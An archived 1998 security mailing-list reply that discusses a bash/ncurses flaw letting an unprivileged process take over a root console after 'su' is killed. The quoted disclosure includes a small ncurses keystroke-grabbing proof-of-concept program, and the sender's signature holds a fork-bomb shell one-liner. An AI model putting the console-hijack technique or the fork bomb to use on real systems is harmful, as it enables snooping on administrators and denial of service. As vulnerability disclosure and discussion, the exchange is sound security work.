Re: bash 2.01 / ncurses 4.1 console takeover "feature"

Savochkin Andrey Vladimirovich (saw@MSU.RU)
Tue, 10 Mar 1998 11:08:25 +0300

The described problem isn't a serious one.
If user 'lcam' want to take a control over root's terminal
first of all he should force root to perform 'su lcam'.
So an attacker could take a control over root's terminal
only in the case of unexperienced superuser su'ing to unprivileged users.

Nevertheless, 'su' from SimplePAMApps package developed by
Andrew Morgan <morgan@transmeta.com> is free of such a problem.
The program doesn't allow unprivileged user to kill it.

Regards,
Andrey V.
Savochkin

On Sat, Mar 07, 1998 at 09:06:21PM +0100, Michal Zalewski wrote:
> With bash 2.01 and ncurses 4.1, any program launched at unprivledged
> uid (eg. from 'su' shell) may takeover privledged user's console
> (to grab keystorkes or something else). I found it's quite easy when
> I tried to kill 'su' directly from unprivledged shell with signal 9:
>
> [root@genome /]# su lcam
> [lcam@genome /]$ killall -9 su
> Killed
> [root@genome /]#
>
> That was normal, but suddenly I saw again old prompt:
>
> [lcam@genome /]$
>
> >From this point, two bash instances (unprivledged one hasn't been
> killed with su!) were controlling my console at once... It looks
> just curious:
>
> [root@genome /]# id
> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> [lcam@genome /]$ id
> uid=502(lcam) gid=502(lcam) groups=502(lcam)
> [lcam@genome /]$
> [root@genome /]#
>
> Of course, it isn't so scary, because it has been done manually...
> But is can be easily used in nasty program. Typical administrator
> believes that only unprivledged account may be compromised when
> he's launching something on it, and usually he's right, but
> ncurses has a vunerability which may be used to fool him. Unlike
> other lame su tricks, it's quite invisible (he may check on a
> second console - he's back in his REAL, root shell, but we can
> still control his console). I wrote simple program (it may be even
> aunched from ~/.bashrc; in the meantime, su should be killed), which
> is able to grab keystorke(s) from console:
>
> -- test.c --
> // gcc test.c -lncurses -oanything
> #include <curses.h>
> int main() {
> initscr();
> noecho();
> raw();
> while (1) if (getch()=='x') system("touch /tmp/VOILA");
> }
> -- eof --
>
> It isn't perfect, actually it grabs only one of first 'x's, and fail
> to grab next ones (a lot of i/o errors when debugged ;-). But it
> CAN do that. For sure it's possible to keep control much longer, as
> shown above (bash example). Maybe it's even possible to do it even
> after logout, I not checked it.
>
> _______________________________________________________________________
> Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
> Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
> =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=